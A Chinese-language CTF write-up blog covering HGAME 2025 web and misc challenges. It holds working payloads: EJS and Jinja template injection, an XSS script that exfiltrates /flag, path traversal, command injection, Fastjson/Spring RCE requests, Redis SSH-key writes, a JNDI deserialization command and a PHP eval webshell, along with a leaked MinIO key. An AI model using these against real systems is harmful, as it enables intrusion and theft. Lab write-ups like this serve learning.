本文最后更新于 2025年2月22日 晚上
Week1
web
Level 24 Pacman
直接去找源码,控制台赋值
1 2 _SCORE =100000 _LIFE =true
得到之后进行base64,栅栏密码解密
Level 47 BandBomb
1 2 3 4 上传恶意EJS文件 创建一个包含EJS代码的文件,内容为读取flag的代码: aaa.ejs <%= process.env .FLAG || require('fs' ).readFileSync('/flag' , 'utf8' ) %>
使用POST请求上传此文件到/upload
接口。
发送POST请求到/rename
接口,将上传的文件重命名为../views/mortis.ejs
:
1 2 3 4 { "oldName" : "aaa.ejs" , "newName" : "../views/mortis.ejs" }
这会将恶意模板覆盖到原模板文件。
访问应用首页/
,服务器渲染被覆盖的模板,执行其中的代码并显示flag。
MysteryMessageBoard
1 2 3 4 5 6 7 8 9 10 11 <script > fetch ('/flag' ) .then (res => res.text ()) .then (flag => { fetch ('/' , { method : 'POST' , headers : {'Content-Type' : 'application/x-www-form-urlencoded' }, body : "comment=" + flag }) }) </script >
中间需要访问/admin再返回触发
Level 25 双面人派对
minio,下载main文件看ida,upx脱壳后直接f12看字符得到密钥这些内容
1 mc alias set myminio http://node1.hgame.vidar.club:32395 minio_admin JPSQ4NOBvh2/W7hzdLyRYLDm0wNRMG48BL09yOKGpHs=
然后下载hints里的src
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 package mainimport ( "level25/fetch" "level25/conf" "github.com/gin-gonic/gin" "github.com/jpillora/overseer" )func main () { fetcher := &fetch.MinioFetcher{ Bucket: conf.MinioBucket, Key: conf.MinioKey, Endpoint: conf.MinioEndpoint, AccessKey: conf.MinioAccessKey, SecretKey: conf.MinioSecretKey, } overseer.Run(overseer.Config{ Program: program, Fetcher: fetcher, }) }func program (state overseer.State) { g := gin.Default() g.StaticFS("/" , gin.Dir("/" , true )) g.Run(":8080" ) }
由代码得是热加载,直接目录映射,在linux环境进行编译打包上传
1 mc cp main myminio/prodbucket/update
Level 38475 角落
考察一个cve,apche的2024
1 http:// node1.hgame.vidar.club:32126 /admin/u sr/local/ apache2/app/ %2 e%2 e%2 f../../ ../../ ../../u sr/local/ apache2/app/ app.py%3 f
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 from flask import Flask, request, render_template, render_template_string, redirectimport osimport templates app = Flask(__name__) pwd = os.path.dirname(__file__) show_msg = templates.show_msgdef readmsg (): filename = pwd + "/tmp/message.txt" if os.path.exists(filename): f = open (filename, 'r' ) message = f.read() f.close() return message else : return 'No message now.' @app.route('/index' , methods=['GET' ] ) def index (): status = request.args.get('status' ) if status is None : status = '' return render_template("index.html" , status=status)@app.route('/send' , methods=['POST' ] ) def write_message (): filename = pwd + "/tmp/message.txt" message = request.form['message' ] f = open (filename, 'w' ) f.write(message) f.close() return redirect('index?status=Send successfully!!' ) @app.route('/read' , methods=['GET' ] ) def read_message (): if "{" not in readmsg(): show = show_msg.replace("{{message}}" , readmsg()) return render_template_string(show) return 'waf!!' if __name__ == '__main__' : app.run(host = '0.0.0.0' , port = 5000 )
打个条件竞争
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 import requestsimport threadingimport time url = "http://node1.hgame.vidar.club:32126/app" def send_payload (): data = { 'message' : '{{config.__class__.__init__.__globals__["os"].popen("cat /flag").read()}}' } requests.post(f"{url} /send" , data=data)def read_message (): resp = requests.get(f"{url} /read" ) if 'waf!!' not in resp.text: print (f"Success! Response: {resp.text} " )while True : t1 = threading.Thread(target=send_payload) t2 = threading.Thread(target=read_message) t1.start() time.sleep(0.01 ) t2.start() t1.join() t2.join() time.sleep(0.1 )
week2
web
Level 21096 HoneyPot
非预期
经过测试可以发现导入数据里面可以随便输入,输入密码的地方输入; /writeflag;#
然后再访问/flag
之后就可以得到flag
Level 21096 HoneyPot_Revenge
是CVE-2024-21096mysqldump
大致思路就是自己用有漏洞版本的mysql,进行远程连接得到shell执行
在 MySQL 命令行中,\!
用于执行外部命令,比如
1 mysql> \! mysql -u username -p database_name < backup_file.sql
因此
1 2 3 4 5 6 7 sudo apt-get install -y build-essential cmake bison libncurses5-dev libtirpc-dev libssl-dev pkg-configwget https://dev.mysql.com/get/Downloads/MySQL-8 .0 /mysql-boost-8 .0 .34 .tar.gztar -zxvf mysql-boost-8 .0 .34 .tar.gzcd mysql-8 .0 .34 root @dkcjbRCmYFsaLJs:~/mysql-8 .0 .34 /include# vim mysql_version.h.in
然后进行编译(时间较长,浮现的时候可以干些其他的事)
1 2 3 4 mkdir buildcd build cmake .. -DDOWNLOAD_BOOST=1 -DWITH_BOOST=../boost make -j$(nproc )
1 2 3 4 sudo make installsudo groupadd mysqlsudo useradd -r -g mysql -s /bin/false mysqlsudo /usr/local/mysql/bin/mysqld --initialize --user=mysql --basedir=/usr/local/mysql --datadir=/usr/local/mysql/data
1 2 3 sudo chown -R mysql:mysql /usr/local/mysqlsudo chown -R mysql:mysql /usr/local/mysql/datasudo /usr/local/mysql/bin/mysqld_safe --user=mysql &
1 /usr/local/mysql/bin/mysql -u root
自己重新设置一个密码
1 2 3 4 FLUSH PRIVILEGES; ALTER USER 'root' @'localhost' IDENTIFIED BY '123456' ; FLUSH PRIVILEGES; EXIT;
在cnf配置运行
1 2 [mysqld] bind-address = 0.0.0.0
为了安全起见创建一个用户
1 2 3 CREATE USER 'remote_user' @'%' IDENTIFIED BY '123456' ; GRANT ALL PRIVILEGES ON *.* TO 'remote_user' @'%' WITH GRANT OPTION; FLUSH PRIVILEGES;
这里是检测
用SELECT user, host FROM mysql.user WHERE user = 'remote_user';
检查
Level 60 SignInJava
动态注册恶意Bean实现RCE
审计一下代码(由于不会java所以和其他师傅要wp分析的,厌蠢症患者勿骂)
(Controller),用于处理POST请求,接受客户端传来的JSON数据,解析并根据指定的bean和方法名反射调用相应的服务方法
1 2 3 @RequestMapping(value = {"/gateway"}, method = {RequestMethod.POST}) @ResponseBody public BaseResponse doPost (HttpServletRequest request) throws Exception {
1 2 3 4 5 String body = IOUtils.toString(request.getReader()); Map<String, Object> map = (Map) JSON.parseObject(body, Map.class);String beanName = (String) map.get("beanName" );String methodName = (String) map.get(JsonEncoder.METHOD_NAME_ATTR_NAME); Map<String, Object> params = (Map) map.get("params" );
使用IOUtils.toString(request.getReader())
读取HTTP请求体。
将请求体解析为JSON对象,并转化为Map<String, Object>
类型。
从解析后的map
中获取beanName
、methodName
和params
,这些是后续反射调用所需的信息。
1 2 3 if (StrUtil.containsAnyIgnoreCase(beanName, "flag" )) { return new BaseResponse (403 , "flagTestService offline" , null ); }
如果beanName
包含"flag"字样(不区分大小写),返回403错误,提示"flagTestService offline"。这可能是为了防止某些特殊请求(如安全相关的标志获取等)。后面的代码是反射调用和异常处理
实现了一个名为 InvokeUtils
的工具类,主要用于动态反射调用Spring容器中的bean方法。该工具类通过反射获取指定bean的方法,并根据请求的参数动态地构建方法参数进行调用。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 @Lazy private static final Filter autoTypeFilter = JSONReader.autoTypeFilter((String[]) ((Set) Arrays.stream(SpringContextHolder.getApplicationContext().getBeanDefinitionNames()) .map(name -> { int secondDotIndex = name.indexOf(46 , name.indexOf(46 ) + 1 ); if (secondDotIndex != -1 ) { return name.substring(0 , secondDotIndex + 1 ); } return null ; }) .filter((v0) -> { return Objects.nonNull(v0); }) .collect(Collectors.toSet())).toArray(new String [0 ]));
@Lazy
:autoTypeFilter
会在第一次使用时进行初始化,避免提前加载,优化启动时间。
autoTypeFilter
:通过扫描Spring应用上下文中的所有bean名称,提取每个bean名的前缀(即包路径的一部分),并用于在JSON.parseObject
方法中作为过滤器。为了防止反序列化时不安全的类型被引入
1 2 3 4 5 6 public static Object invokeBeanMethod (String beanName, String methodName, Map<String, Object> params) throws Exception { Object beanObject = SpringContextHolder.getBean(beanName); Method beanMethod = (Method) Arrays.stream(beanObject.getClass().getMethods()).filter(method -> { return method.getName().equals(methodName); }).findFirst().orElse(null );
获取Bean :通过SpringContextHolder.getBean(beanName)
获取Spring容器中的bean实例。
获取方法 :通过Arrays.stream(beanObject.getClass().getMethods())
获取所有方法并通过method.getName().equals(methodName)
来找到匹配的方法。若找不到,返回null
1 2 3 4 5 6 7 8 9 10 11 if (beanMethod.getParameterCount() == 0 ) { return beanMethod.invoke(beanObject, new Object [0 ]); } String[] parameterTypes = new String [beanMethod.getParameterCount()]; Object[] parameterArgs = new Object [beanMethod.getParameterCount()];for (int i = 0 ; i < beanMethod.getParameters().length; i++) { Class<?> parameterType = beanMethod.getParameterTypes()[i]; String parameterName = beanMethod.getParameters()[i].getName(); parameterTypes[i] = parameterType.getName(); if (!parameterType.isPrimitive() && !Date.class.equals(parameterType) && !Long.class.equals(parameterType) && !Integer.class.equals(parameterType) && !Boolean.class.equals(parameterType) && !Double.class.equals(parameterType) && !Float.class.equals(parameterType) && !Short.class.equals(parameterType) && !Byte.class.equals(parameterType) && !Character.class.equals(parameterType) && !String.class.equals(parameterType) && !List.class.equals(parameterType) && !Set.class.equals(parameterType) && !Map.class.equals(parameterType)) {
对于有参数的方法,首先解析出方法的参数类型和参数名称,并且构建一个参数数组parameterArgs
来存放实际参数。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 if (!parameterType.isPrimitive() && !Date.class.equals(parameterType) && !Long.class.equals(parameterType) && !Integer.class.equals(parameterType) && !Boolean.class.equals(parameterType) && !Double.class.equals(parameterType) && !Float.class.equals(parameterType) && !Short.class.equals(parameterType) && !Byte.class.equals(parameterType) && !Character.class.equals(parameterType) && !String.class.equals(parameterType) && !List.class.equals(parameterType) && !Set.class.equals(parameterType) && !Map.class.equals(parameterType)) { if (params.containsKey(parameterName)) { parameterArgs[i] = JSON.parseObject(JSON.toJSONString(params.get(parameterName)), (Class) parameterType, autoTypeFilter, new JSONReader .Feature[0 ]); } else { try { parameterArgs[i] = JSON.parseObject(JSON.toJSONString(params), (Class) parameterType, autoTypeFilter, new JSONReader .Feature[0 ]); } catch (JSONException e) { for (Map.Entry<String, Object> entry : params.entrySet()) { Object value = entry.getValue(); if ((value instanceof String) && ((String) value).contains("\"" )) { params.put(entry.getKey(), JSON.parse((String) value)); } } parameterArgs[i] = JSON.parseObject(JSON.toJSONString(params), (Class) parameterType, autoTypeFilter, new JSONReader .Feature[0 ]); } } } else { parameterArgs[i] = params.getOrDefault(parameterName, null ); }
如果方法参数类型不是基础类型(如String
, Integer
, List
等),则尝试使用Fastjson的parseObject
将params
中的相应字段反序列化为目标参数类型。
使用autoTypeFilter
:在反序列化过程中,使用autoTypeFilter
来避免类型安全问题。
如果params
中不存在该参数名,则尝试将整个params
映射到目标类型。
如果解析失败(JSONException
),则通过递归尝试解析参数内嵌的JSON字符串。
对于基础类型(包括String
、Integer
、Boolean
等),直接从params
中获取对应的值。
1 return beanMethod.invoke(beanObject, parameterArgs);
这个是触发点,利用下面这个类
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 package cn.hutool.core.util;import cn.hutool.core.exceptions.UtilException;import cn.hutool.core.io.IORuntimeException;import cn.hutool.core.io.IoUtil;import cn.hutool.core.lang.Pid;import cn.hutool.core.text.StrBuilder;import java.io.Closeable;import java.io.File;import java.io.IOException;import java.io.InputStream;import java.nio.charset.Charset;import java.util.ArrayList;import java.util.List;import java.util.Stack;public class RuntimeUtil { public static String execForStr (String... cmds) throws IORuntimeException { return execForStr(CharsetUtil.systemCharset(), cmds); } public static String execForStr (Charset charset, String... cmds) throws IORuntimeException { return getResult(exec(cmds), charset); } public static List<String> execForLines (String... cmds) throws IORuntimeException { return execForLines(CharsetUtil.systemCharset(), cmds); } public static List<String> execForLines (Charset charset, String... cmds) throws IORuntimeException { return getResultLines(exec(cmds), charset); } public static Process exec (String... cmds) { try { Process process = new ProcessBuilder (handleCmds(cmds)).redirectErrorStream(true ).start(); return process; } catch (IOException e) { throw new IORuntimeException (e); } } public static Process exec (String[] envp, String... cmds) { return exec(envp, null , cmds); } public static Process exec (String[] envp, File dir, String... cmds) { try { return Runtime.getRuntime().exec(handleCmds(cmds), envp, dir); } catch (IOException e) { throw new IORuntimeException (e); } } public static List<String> getResultLines (Process process) { return getResultLines(process, CharsetUtil.systemCharset()); } public static List<String> getResultLines (Process process, Charset charset) { InputStream in = null ; try { in = process.getInputStream(); List<String> list = (List) IoUtil.readLines(in, charset, new ArrayList ()); IoUtil.close((Closeable) in); destroy(process); return list; } catch (Throwable th) { IoUtil.close((Closeable) in); destroy(process); throw th; } } public static String getResult (Process process) { return getResult(process, CharsetUtil.systemCharset()); } public static String getResult (Process process, Charset charset) { InputStream in = null ; try { in = process.getInputStream(); String read = IoUtil.read(in, charset); IoUtil.close((Closeable) in); destroy(process); return read; } catch (Throwable th) { IoUtil.close((Closeable) in); destroy(process); throw th; } } public static String getErrorResult (Process process) { return getErrorResult(process, CharsetUtil.systemCharset()); } public static String getErrorResult (Process process, Charset charset) { InputStream in = null ; try { in = process.getErrorStream(); String read = IoUtil.read(in, charset); IoUtil.close((Closeable) in); destroy(process); return read; } catch (Throwable th) { IoUtil.close((Closeable) in); destroy(process); throw th; } } public static void destroy (Process process) { if (null != process) { process.destroy(); } } public static void addShutdownHook (Runnable hook) { Runtime.getRuntime().addShutdownHook(hook instanceof Thread ? (Thread) hook : new Thread (hook)); } public static int getProcessorCount () { int cpu = Runtime.getRuntime().availableProcessors(); if (cpu <= 0 ) { cpu = 7 ; } return cpu; } public static long getFreeMemory () { return Runtime.getRuntime().freeMemory(); } public static long getTotalMemory () { return Runtime.getRuntime().totalMemory(); } public static long getMaxMemory () { return Runtime.getRuntime().maxMemory(); } public static long getUsableMemory () { return (getMaxMemory() - getTotalMemory()) + getFreeMemory(); } public static int getPid () throws UtilException { return Pid.INSTANCE.get(); } private static String[] handleCmds(String... cmds) { if (ArrayUtil.isEmpty((Object[]) cmds)) { throw new NullPointerException ("Command is empty !" ); } if (1 == cmds.length) { String cmd = cmds[0 ]; if (StrUtil.isBlank(cmd)) { throw new NullPointerException ("Command is blank !" ); } cmds = cmdSplit(cmd); } return cmds; } private static String[] cmdSplit(String cmd) { List<String> cmds = new ArrayList <>(); int length = cmd.length(); Stack<Character> stack = new Stack <>(); boolean inWrap = false ; StrBuilder cache = StrUtil.strBuilder(); for (int i = 0 ; i < length; i++) { char c = cmd.charAt(i); switch (c) { case ' ' : if (inWrap) { cache.append(c); break ; } else { cmds.add(cache.toString()); cache.reset(); break ; } case '\"' : case '\'' : if (inWrap) { if (c == stack.peek().charValue()) { stack.pop(); inWrap = false ; } cache.append(c); break ; } else { stack.push(Character.valueOf(c)); cache.append(c); inWrap = true ; break ; } default : cache.append(c); break ; } } if (cache.hasContent()) { cmds.add(cache.toString()); } return (String[]) cmds.toArray(new String [0 ]); } }
1 2 3 4 5 6 7 8 9 10 11 POST /api/gateway HTTP/1.1 Host: node1.hgame.vidar.club:31791 Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Content-Type: application/json {"beanName" :"cn.hutool.extra.spring.SpringUtil" ,"methodName" :"registerBean" ,"params" :{"arg0" :"shell" ,"arg1" :{"@type" :"cn.hutool.core.util.RuntimeUtil" }}}
1 { "beanName" : "shell" , "methodName" : "execForStr" , "params" : { "arg0" : "utf8" , "arg1" : [ "whoami" ] } }
1 2 3 4 5 6 7 8 9 10 11 POST /api/gateway HTTP/1.1 Host: node1.hgame.vidar.club:31791 Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Content-Type: application/json {"beanName" :"shell" ,"methodName" :"execForStr" ,"params" :{"arg0" :"utf8" ,"arg1" :["/readflag" ]}}
Level 257 日落的紫罗兰
nmap可以扫一下这两个端口,一个是ssh,一个是redis,redis无密码
首先的思路是对ssh进行爆破,利用hydra利用字典看看能不能爆出来,没有成功。
尝试之后ssh连接不了,redis里面没东西,题目给了user.txt,可以尝试写个id_rsa上去
1 2 3 ssh-keygen -t rsa (echo -e “\n\n”; cat ./id_rsa.pub; echo -e “\n\n”) > spaced_key.txt cat spaced_key.txt |redis-cli -h node1.hgame.vidar.club -p 30877 -x set ssh_key
1 2 3 4 5 6 7 8 └─$ redis-cli -h node1.hgame.vidar.club -p 30877 node1.hgame.vidar.club:30877> config set dir /home/mysid/.ssh OK node1.hgame.vidar.club:30877> config set dbfilename "authorized_keys" OK node1.hgame.vidar.club:30877> save OK node1.hgame.vidar.club:30877> exit
将 Redis 数据存储在 authorized_keys
文件中,了利用 Redis 来管理 SSH 公钥,从而实现远程身份验证。
1 ssh -i id_rsa mysid@node1.hgame.vidar.club -p 30156
1 scp -i ./id_rsa -P 30156 /JNDIMap-0.0.1.jar mysid@node1.hgame.vidar.club:/tmp
1 /usr/local/openjdk-8/bin/java -jar /tmp/JNDIMap-0.0.1.jar -i 127.0.0.1 -l 389 -u "/Deserialize/Jackson/Command/Y2htb2QgNzc3IC9mbGFn"
再开个窗口先ssh
1 curl -X POST -d "baseDN=a/b&filter=a" http://127.0.0.1:8080/search
最后就可以cat /flag了(:
Level 111 不存在的车厢
长度字段使用 uint16(2字节),限制单个字段最大为 65535 字节,所以当⼀个⼤于uint16最⼤值的Length被序列化时会 产⽣整数溢出,改变序列化后的语义 H111协议存在pipeline以及连接复⽤,前⾯搁置的部分数据会被按照第⼆个 请求解析并响应,在外部第⼆个请求打到proxy的时候,有⼀定概率复⽤同个连接并⾛私出这⼀部分 response
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 func TestGenRequest (t *testing.T) { testReq := &http.Request{ Method: "POST" , RequestURI: "/flag" , Header: map [string ][]string { "Content-Type" : {"application/json" }, "User-Agent" : {"test-client" }, }, Body: io.NopCloser(strings.NewReader("test body" )), } var buf bytes.Buffer err := WriteH111Request(&buf, testReq) if err != nil { t.Fatalf("expected no error, got %v" , err) } t.Logf("Serialized length: %d bytes" , len (buf.Bytes())) t.Logf("Hex dump: %s" , hex.EncodeToString(buf.Bytes()))
放在protocol/request_test.go,通过gotest-v拿到输出
最后放yakit里
Misc
Computer cleaner
正常导入vm
搜索危险函数
1 2 grep -rn "eval(" /var/www/html /var/www/html/uploads/shell.php:1:<?php @eval ($_POST ['hgame{y0u_' ]);?>
然后看/var/log里面的日志
有一天是121.41.34.25
访问得到第二部分flag
第三部分也是看日志
1 2 3 1.41.34.25 - - [17/Jan/2025:12:02:05 +0000] "GET /uploads/shell.php?cmd=cat%20~/Documents/flag_part3 HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36" vidar@vidar-computer:/var/www/html$ cat ~/Documents/flag_part3 _c0mput3r!}
最后得到
1 hgame {y0u_hav3_cleaned_th3_c0mput3r!}
Computer cleaner plus
进行ps发现denied,查看一下发现后门
hgame{B4ck_D0_oR}